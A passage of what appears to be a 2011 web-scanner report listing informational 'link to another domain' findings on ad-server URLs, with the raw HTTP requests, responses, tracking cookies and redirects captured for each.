kQfIfrEeQndfPQcUU9Y3wLGOaTyD0NNQaCid_rWLSj37arSozuBgqeZjp8etrKKy4vfq5hSqdfC_dvkRpi8YKqMVJJLJFDSB1wQojnNFLtzTBZ8-sNi07K9uPKjmS8KSy5IN8fq6zThfQknsYE77aOKgIo0ch62xNrWzvaWUZq3JOrlyZTfomXyu4Bi_JhsDf_Pg2Vk_EWg-3dTD9pFW_t_N8vtWVDC3jC3vfThv-B4KgwPLGN7w3g3UlIFn3ul7s6FAXEc8n5El2XcbrTufdfD_fSbxeAqyz9mJvwFQ9V0D5pFleY0M_uVIjbBBIbeiEGIeAZyJv0xLpehx5_KSnf80bUI96fpmYoEvb9KaHgGmzu9XVcy87K21WiFWA7RvztB-_rFiFIyTKfRMvlirJgtkwbjBAoWil1i7PXIGTKPYDYLf_dPYrAYTeqFbcrk8X1saScQH9yIY0gJl3Ymni7O_xO9FeNohGj7gGWDQ0O1tBjOUZ1X10to-JHx5UUQQ0XtSgyP9-pRtjKBA9CwxHOgIr_gZbPY3k0bg--U9ljw1q3jr96MmE73EdnErm3VtQTp-vphJrHygaBaOeith_F8SopLDsHqhmxtya7PjWj37arSozuBgqeZjp8etrKENXuiXvcnxOtam6O_IsnO4KqMVJJLJFDSB1wQojnNFJEVHJ1z2dK20EbWNc6m8qRp83LiQ18GX1WeBLRg0RBKOUwHwhiIhI6vYlDAmBKnXv1Fpf8CMCp7A3R8eW1vOx0sDf_Pg2Vk_EWg-3dTD9pFXajTYKOi3gdGMXkHYMSDJk5beZtUZNiQI8gP2AgMQPK76e63gI2hOWL2Ep1CAYYv3upE1fb8iIaMDvq8O5E7ddV0D5pFleY0M_uVIjbBBIbgr1jm6Fdm6TRz6ZxBfzt611SQRQv3TGdgGJCs-z7CWJAkkKm6QVjyzniKa2qmyLJBOs8NTGVmBHfXD5TumxA7PEEKID__3nlil_0MhemW32JW_NPA2PuMaV75RuOu_5zlMTmp1TZ5-IIzMuDF1_0mBYLE_jcsOigPlI7QMxsd0k9urfgfcUQTe5lNoZaZWq5BYNVwabYUPR3gChAX-5C0hUbM35mGHu1L4rJubbHfnWmOvaKAxmdzKR1yXa2qa0-xTnsTrJL3SjuDZ9-fxYQcEyL5UkQCnYXX03_6C3vZUgqL1ZnYm4I_njMSwYlYvV2g6TZT7vDkfIj-fJyXAXE341dpCMud6cedPrSXSPTfefQdM0tP2xoTvQ52Ln07PO5IUAcF9vr5H3GAXs_-7yBpssVFRYQr59E7HdjTfWYPAslTUhW2E-YuxF1FbHV_FU6Rem_8E1Csz4n-rOFLD0Y-V6t9vVViri1JPMkdk77iZWz50grATD8xTNk0-ttpVG8t4a3Iba5HVb_eDDGLyxa_0Ko4VQPJ6A5gDBt5kbFinAFixJ3IWUYzcoMk8sB5tjiTrQBlcf0NJzXpTja-ihhu1XF-9XhbnCXHvlFQ47YeJAWbQ2X-WjRVub53uydBonxyQvUNumZnfeOaFmzZlKlz8p7-_hIyW9RoB-H3tbotSN_C65ZNmsOHJYk5k3SR-ZGy0X-wTFcHGUhg88JtkH_1uEFTei8PnCizvB1uWFefJPRJgaL2pnfKOcF8wRXCTYK04DpArz-zLNxXeUzw_9tf3oxEBCW6nl0FJM5WBXKQ34N0lZKdhblcSKzBgN4X6JasxOnGHEmSMOVIHu3SNyD1AqnZ49Ec3Q__8vPE7h5F01m6n1yUfbYChHEmLBeQF_NSbWuoJH3l26X7K5i82oK2jzZTUOyfU2owAe4xf5Hl6tImgNB2JcS8jzwpwic9yIMEtC1MbYoTB2BsFsDwNSUC9iDyp6rjDUidnUlPRlNL-oCFz0fO78jHadnaghHetAf9Tp2HXGJI4awJ1PvXRlZGa5FveX0RDw1Yo9N74-luGLA0ZkTirQHakxKOnnEUnp_yj196o0sQyu3m_nk-h8uKyVtWOAEWD6gQvlrgUOeCD55G4L_2wfjZn9gcJEZ6K4YhOO0VCi4NoVVnsVZa3MksdqHD17rXSrLpAvfaEaEclc; fc=zmuF1sAW39Yfq78BeHbK_qzfG8Iim-KOo0wyjG8eNFNzOQSYplWqfmVg5kiJcThQh_6Fy59RsfMGx2OPDA92rV7k3wz-hA_nvJsQ77ws1V62qLaXiXtLgqbyIAPknaGJF2Y3nF2sogXvl_T-_cXpoigesiGYW8faHJeyEdZb2TSAMF0jf9Pgr0Iy9TRYKUyQuY-vjiE5I-_rfxn3SNCLFA; pf=N3U8NKDFVOjQiAfbeXebrRm2HEHLkBuljJwlJwX_KNMIHKIn0aMUCJnjty0nF6sdy3YNScPJBpPFFuHL0J---AiNvVCUgeP8UtXEbkd1ItLB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:13:35 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:35 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=deBD6XxjsYiz5SlTL3QsHqCeCZZAhJZACNRa8rYWu9CY481wEkFtGX7HudJA1SwJxEdzmswgsukEeGYUFx4XIAH2_SOXrIDHPTc0gR2ZYb6X4Qp5J-iSAILnbVuT-E5I21TccxBCE2uOguftNs3B8ws3ywwa2wQp8g03EqWK3wXULH_zJEKV55m8F5IT4bStbNZCZ7Tuj_BJ7cZLEc5mK5sf4do6mfC-8t81xzfpAuHTE-6hqyhk_njhE1XVDqAvuPwNs9axYxesjGsAsjtmS7fwESJ4HNhmJtjvBex-YKB48eNzMDW20n17Occ4gTB__IK0nnhWM2b_q3ohsfZ0FEdiZK7lOdlFxq7hsewqebqQtSNfSWxIoar8U2brXnw1emNa-3CGw7dg2Xbxl9yyj7jdLOqAlYvMy4P_GXV-l2Nd0_CLzTvwT1_vWGRBlmkvMv1vOgw0X3-gN8kfaXCa2gpKpH42mzqWVKAieGonOpFqGjdQJTtjVZ9bXK_YQ_BTTZX5ZRX6gPsVI-wwHnP-7m1HPNJmxjyYHWoZ-RvqO1RCjqVnqlStqGRd7sOILi9yibQu-KItSuO9m-H6ccgm_x3BGIBe1qfIDTYPebZTLrDOC-VCmCQbUZMtawqCLvvmKR1gXBTdH5jry0PtoQ1AeO6XtB_8KKtgn7ZA9jOrjKEd8fmIByXYO4W9y75kdG0AQoWhO66D78aQTUGOa-5a4D7WEZ4W3MEhxLVI5mActJltBPdeqoht9ByqjYbOh33ur-s7TV8zO61799jJJQ7Db9rxZB7h3-RxsMa99bBPJd4GmpS1vpTy7CEw_F27aSBKqf2kh-PqYvIakotDSFG3J7fwESJ4HNhmJtjvBex-YKBKL2bBINxLZG77GEc74ezLum1TeQ0gLOufLDRpE5fx_doCOQisz4wYu1aRlLO_q9fFuXJfodYfBlfBGQdDWQIYemNa-3CGw7dg2Xbxl9yyj7_nb_paFFYJ3mkNwD4RMkIYjVge061K_CIJwjIVI3mKxylPN4c5ASigyqNvfErAzY7UcSE8Aook9MaDI3AzHm5qGjdQJTtjVZ9bXK_YQ_BTIA9qP5ZGicDObFIm227LY21HPNJmxjyYHWoZ-RvqO1SO6j1-eSdNp74pQOH_YTUz402GpSpZYrGQooIBIjmomSumXewWqlkGDMbbuT0pqPmli-F_XWotfUo8MrEbWr7hVdA-aRZXmNDP7lSI2wQSG1UIktgZIbPn0NUyIVFCCIhZgJrwaehFyqmD8BJNc02UdxByyd4I_jonpY8dinXj8Adt1kcsyM0PeiMQ7LTog2zrMfsNzkHkjjmmiKRiTpG_ZxVGypkJkxppNXBoj9hdYvxqzCp9mqb-fnf3vurqUKQ36EKXMAJD1f6mBFy-CLB31rG3DY3mwe9niReY-1Ub9QfbrEhJ1dvYLO3-yqcOOvXBgo6wiEWLgalkBJ3Yj08NQQ0XtSgyP9-pRtjKBA9Cw5kk-u3_879HeEzFKlOGPm1jw1q3jr96MmE73EdnErm3Am61Etmv-j5Jhttl5w_1NLVStSd8QzozyBSfQQx1fCKj37arSozuBgqeZjp8etrKqknRaP3V6oxECP0GOXabAIKqMVJJLJFDSB1wQojnNFK_L63JiB7oIrCw_byJGvNVBXmtxmz59YVbf0kdPFaj7nqjVEnayD5Ik9CHgcwVvzlMeKnT51KOU7tzVZSIEVXesDf_Pg2Vk_EWg-3dTD9pFT1DxfFmcifo1L4is0eoSxqZt2vLw1MQCNkN4b9W6YHjl7s6FAXEc8n5El2XcbrTueYqMsta8R3IevGWeQFGXBBV0D5pFleY0M_uVIjbBBIbslKzWLNSym58FovJA1cH9FITL70mX0cxZUNU6wgGFN9BSY6ik0FwtKNMqfv1k5CFmBfHR2QfBfW5szOuRY7narJgtkwbjBAoWil1i7PXIGQgBLG9yrBXxQ31WfiIrAk_B5xxjLy2u5fweq-AAPZ5sAIUZEyfLi_7gOz7FaE1JieQX-h53vB3lT-Gx03ffzIYQQ0XtSgyP9-pRtjKBA9CwzvLjrKqA2na3U7FHrRyysJjw1q3jr96MmE73EdnErm3Ya43PO_FBS1L8nFPfLNsoiQl1IbfBMxI7h-o4eVVmtGj37arSozuBgqeZjp8etrKR7t1lc6gxoU1PGs3RB5IFYKqMVJJLJFDSB1wQojnNFK-ydpF3OeXL-hvxClrpcTy8nBIQTGDQ0e81J548GDsezv90T-lAb-YFeOKm0KYk-jzOCOCLkdpLACc0kOaNihisDf_Pg2Vk_EWg-3dTD9pFd3Bx501MUvGDpJrg_dMjU0YXtmmbk-N1wOfquUn-OXo2ho9tr4zKfsJYr-S860V-_zfVdHmuabJokUCf89rOskZswsTNML5WtS_tFL4_HO-T3lqtRCIBQTAkUtF8Ze6x5-zCwLajI_fAi7yzInpUPcCtBtg3d9fRsI_s4Q4xuhxCO4UkD7DmRDCuTTKIqgfiiDMSJYYfKRa5oYJ-HF7HkrcgJAQ2nCtjZ9v7V-hw5WdNsjNgBK20dXMTQ5_E-tD43aK-dl03C8FcsmzUAvnpssfBrVo25TIsoi-UjNGpY4-CTTZ0LqOpDpMC4Ik6TqNC_VP1CVPOS9dQLLTrmNzscBrMaw8_PZJviQbsdfy3S10UYeZ7fVAuz1zjmMZ0gGgqLt2VjWlbLw3c1pgyIE5CShvuJBfhMMc3-2rXuK89xdwUG1xeHeMVc4q6BbKL36W03oeTQ7Lr-7EWe0QY9QI2B1l0eqesD8_A0QCk8hIfrJw6MNNscszzM1r-Wj1AH2-IofYdTYZ0YtkCZ7lQI-xUBV6kx3BKHN13VIhsPL-J7LlucGL4OVeuTCXzAPeveMCAT7rLlGdNjVTJlBXR5Ql_CV-e2PgEpaD3g5vJV7qkuAaG5Cvgl4yFR1SLt57-HYDswIvtbjbiK6PM_JhwfU7EXS7gMGPfPL5upKwYOp1wyHZYqfh7Jk_UqnNY8zMBdaawiSXfNfZkXaAxWmxFMLqWbSLsPkWvuS2cJVtRIZukDJCsxKU8-jozAhZyBK7r0iDK1xXg9YM80IWWEj9xS4caO9Cc6tCW1caCY5tvgQYuziiUJ-BlQ55NEjM4csCKauR9fMy_oUyyPFYNoTEgyHSw_kjEb4rLm3q5zsxVXs4oa4_T5HJ8POaPhCLXqvhJ4PHOaXPviAPJdZnXyR34eV66BHZSFpdi22R_hlJYFq3IvWpfCPO5tADmqIGCNFj6jsbOrS9MmfQK_Fi1PH23xdE5pl_pMk2OgJnYAbvpzWSxVtlvlyrKH42N2E6DjOdA07AsE5ItNy8ZSWW1QxlzR5Wk4lredlHZ5PB4vZS9PjysgJtUf7Icm9Hx-iCdWMBVi86BPT_qkzfsSKKeD8t82Vp0lh2z3EGVDVryO3sDqvHjCvljrmGqA7HlQFRbEgj3Apu56U9PvLT5Yl-7nSexy6OYYxYue7BCLJbDJi_av1GKkV-G48M-k3pWEsY0DSMKeXVjBCwtqNB_pQoyOMmpgj114hj1XX_gstQp5fQiHyRyXU5gJYCPMLcp-WjE9gA8bSugzTecOAf0cShrg4vL8HVPUiTQclLOdW1PrxE8drMecpZ; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:35 GMT; Path=/
Set-Cookie: fc=uxxiXch1QKU85iYPGx-2w4-YPxezbeSP3RflKnmPzFDfnbopa38X7kcK0gidXbQx2g9tsxB_asXrCmB8yAZFhCEVuEBWF2BJd4O6JLUjzhsHGSI5ugrubbCeW8l4bd0K3B8CrRgeBwcufwGyEuNk9fwEc8UdWGFr9OnyQPdjde1XZQx7UVDjyg8AFQSGxDX399fWqLtNe7SQ8BirYxSk-4mBf3sYQ8SCqGOQToPn17o; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:35 GMT; Path=/
Set-Cookie: pf=ECYJS9-oxql8N_uZXFb8CHwDE7_wM8CB1cwK-wdnj-uWHdXU58c6zYPI8ptz-kcxy3YNScPJBpPFFuHL0J---Fj9Fw_ghz_PVAPwGCUX-90-T3t6mL3yHizb4mwtgU5QQNk8yq0Qj72V6SyxgQxbLVJL8kq4-YDRBElsqmGBsv1JY3Xda-wZS8AHLAgUrAb8RARr4sEY7YNrQUJwCnGgOKCYwbnr2fUVVWky3vF6-lXmzrV_z0Y16mAJLIK7wxIJJ893jYsNF3UJjN7Q_g1qDK0_PipTd7EM21gJm5CQiuVYwgKi80iaKojRy9CSHHsThmpzkllKlZJ2Qy8JJq0K6kocqRzWaGRRbNLHTv61h1138Wgc784VvH-zNSzEj7GoNx16neM2KucGo2pbORyATp4z6TmQssiIT5OVU1ls_spuUzkxn8VlM2iGlOk2z4tE4KQQf9OREyizwHyC2sAdAoUKoSM2yvo48XmD0BI9PnvNImweGuBUil0xi-GN04zWlMZiZE9V-GV_y5gECNbsUl6zzjIXKON9Ynaz9n_pzpv8riJB2DO_Q0ZyrxISTm6JePqWyN4HBtUdcmaqEdLOS10KRhJdpOeo4Y8z336nR05UAwdLKUrYLuZ_J4UaUiSxWD-8jO93H0kg2wwsdjjJO52gY7B3BVcJwfOEGFr7W86rM_irW5Kpbu5iBYpA09CpR7G5mgMxLDQyBkrANU12WWSntU2RQp1wWIzpm9Mzs7ryFlJvRkWmLqxuLsRCPJDHVxmontykR1O5ZT7KsC0OyTCvCn1PPbvylVmfNaf6LEwyekw0-5mCFY0EEkEZ4sjQwyYG4CKBOwOYkgFO_pjvZTPKPZiOLB_V2S5_NmA0yleF6EnxPRAQHlTM_nRSVZNLUCZ06c3hrLHNiJJ7ty33vJCyNKWeeDzoqtS3YAmJ9qKQlYCzu_UgrT1Pp6hrlsCXuCmVYOfDKjQfMjxkBwBRFWCxARYwu7BAeh_4_-UoSd0qgvYOm6Cd9iuDupssJeiSV_KjX_45VtKhb8h2yQJgHA; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:35 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:13:35 GMT
Content-Length: 10114


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
</div>\n            \n                <img border="0" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442545&PluID=0&ord=&ord=2857668319709323974&rtu=-1">\n                \n        \n    \n        \n    \n                    \n                    \n\n\n\n\n                        <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=1&mpid=104198
...[SNIP]...

23.52. http://ads.neudesicmediagroup.com/a.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /a.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /a.aspx?Task=Click&ZoneID=58&CampaignID=715&AdvertiserID=59&BannerID=503&SiteID=6&RandomNumber=1178939087&Keywords= HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25; %24CC=US; %24RC=TX; %24MC=0

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 171
Content-Type: text/html; charset=utf-8
Location: https://netserv.fpoint.com/redir/redirect.asp?rdtl=985
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:07 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://netserv.fpoint.com/redir/redirect.asp?rdtl=985">here</a>.</h2>
</body></html>

23.53. http://ads.neudesicmediagroup.com/a.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /a.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /a.aspx?Task=Click&ZoneID=58&CampaignID=736&AdvertiserID=15&BannerID=458&SiteID=6&RandomNumber=1178939087&Keywords= HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25; %24CC=US; %24RC=TX; %24MC=0

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 166
Content-Type: text/html; charset=utf-8
Location: http://www.discountasp.net/tfs/go/go.aspx?i=15253
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:12 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.discountasp.net/tfs/go/go.aspx?i=15253">here</a>.</h2>
</body></html>

23.54. http://ads.neudesicmediagroup.com/a.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /a.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /a.aspx?Task=Click&ZoneID=54&CampaignID=717&AdvertiserID=59&BannerID=506&SiteID=6&RandomNumber=216444598&Keywords= HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 171
Content-Type: text/html; charset=utf-8
Location: https://netserv.fpoint.com/redir/redirect.asp?rdtl=988
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
Set-Cookie: %24CC=US; expires=Mon, 25-Apr-2011 15:57:06 GMT; path=/
Set-Cookie: %24RC=TX; expires=Mon, 25-Apr-2011 15:57:06 GMT; path=/
Set-Cookie: %24MC=0; expires=Mon, 25-Apr-2011 15:57:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:06 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://netserv.fpoint.com/redir/redirect.asp?rdtl=988">here</a>.</h2>
</body></html>

23.55. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=31%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=31%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.4720723643800129 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-CCDD-8ED5-1209-8C0000510101; PRca=|AKKi*9708:13|AKEA*263:1|#; PRcp=|AKKiAC6a:13|AKEAAAEP:1|#; PRpl=|FQue:7|FQud:6|FFCo:1|#; PRcr=|GKiM:7|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:7|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:48:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-1CDE-DE1A-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:14|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:14|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:8|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:8|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:8|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=31;1=2;2=1;s=376;g=172;m=34;w=51;i=31;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-1CDE-DE1A-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.56. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:51|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=54%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=54%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.09599869235629632 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-6EE5-084F-1209-8C0000510101; PRca=|AKKi*9708:25|AKEA*263:1|#; PRcp=|AKKiAC6a:25|AKEAAAEP:1|#; PRpl=|FQue:19|FQud:6|FFCo:1|#; PRcr=|GKiM:19|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:19|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:51:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-86E5-7DBA-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:26|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:26|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:20|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:20|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:20|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

